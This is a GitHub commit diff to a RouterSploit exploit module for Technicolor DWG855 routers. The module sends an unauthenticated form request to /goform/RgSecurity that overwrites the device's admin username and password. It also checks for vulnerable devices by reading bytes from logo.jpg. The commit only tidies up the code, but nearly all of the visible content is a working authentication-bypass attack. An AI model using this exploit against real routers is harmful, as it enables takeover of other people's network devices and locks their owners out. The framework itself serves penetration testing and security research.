Update dwg855_authbypass.py

ccfa2dcb · 0BuRner · GitHub · 6e5c544d · ccfa2dcb
Commit ccfa2dcb authored Nov 15, 2016 by 0BuRner Committed by GitHub Nov 15, 2016
Hide whitespace changes
Inline Side-by-side

Showing with 7 additions and 13 deletions

dwg855_authbypass.py ...rsploit/modules/exploits/technicolor/dwg855_authbypass.py +7 -13

No files found.
--- a/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
+++ b/routersploit/modules/exploits/technicolor/dwg855_authbypass.py
-import binascii
-
 from routersploit import (
    exploits,
    print_success,
@@ -34,14 +32,14 @@ class Exploit(exploits.Exploit):

    target = exploits.Option('192.168.0.1', 'Target address e.g. http://192.168.0.1', validators=validators.url)
    port = exploits.Option(80, 'Target Port')
-    nuser = exploits.Option('ruser', 'Overwrite old user with.. ')
-    npass = exploits.Option('rpass', 'Overwrite old password with.. ')
+    nuser = exploits.Option('ruser', 'New user (overwrites existing user)')
+    npass = exploits.Option('rpass', 'New password (overwrites existing password)')

    # The check consists in trying to access router resources with incorrect creds. in this case logo.jpg Try it yourself!
-    vulnresp = binascii.unhexlify('114475636b7900')  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"
+    vulnresp = "\x11\x44\x75\x63\x6b\x79\x00"  # Hex data of 0x11 + "Ducky" + 0x00 found on image "logo.jpg"

    def run(self):
-        print_status("Changing " + self.target + " credentials to " + self.nuser + ":" + self.npass)
+        print_status("Changing", self.target, "credentials to", self.nuser, ":", self.npass)
        url = sanitize_url("{}:{}/goform/RgSecurity".format(self.target, self.port))
        headers = {u'Content-Type': u'application/x-www-form-urlencoded'}
        data = {"HttpUserId": self.nuser, "Password": self.npass, "PasswordReEnter": self.npass, "RestoreFactoryNo": "0x00"}
@@ -72,11 +70,7 @@ class Exploit(exploits.Exploit):

        response = http_request(method="GET", url=url, headers=headers)

-        if response is None:
-            return False  # target is not vulnerable
-        elif self.vulnresp in response.text.encode('utf-8'):
-            return True  # device is vulnerable
-        elif response.status_code == 401:
-            return False  # target is not vulnerable
+        if response is not None and self.vulnresp in response.text.encode('utf-8'):
+            return True
        else:
-            return False  # target is not vulnerable
+            return False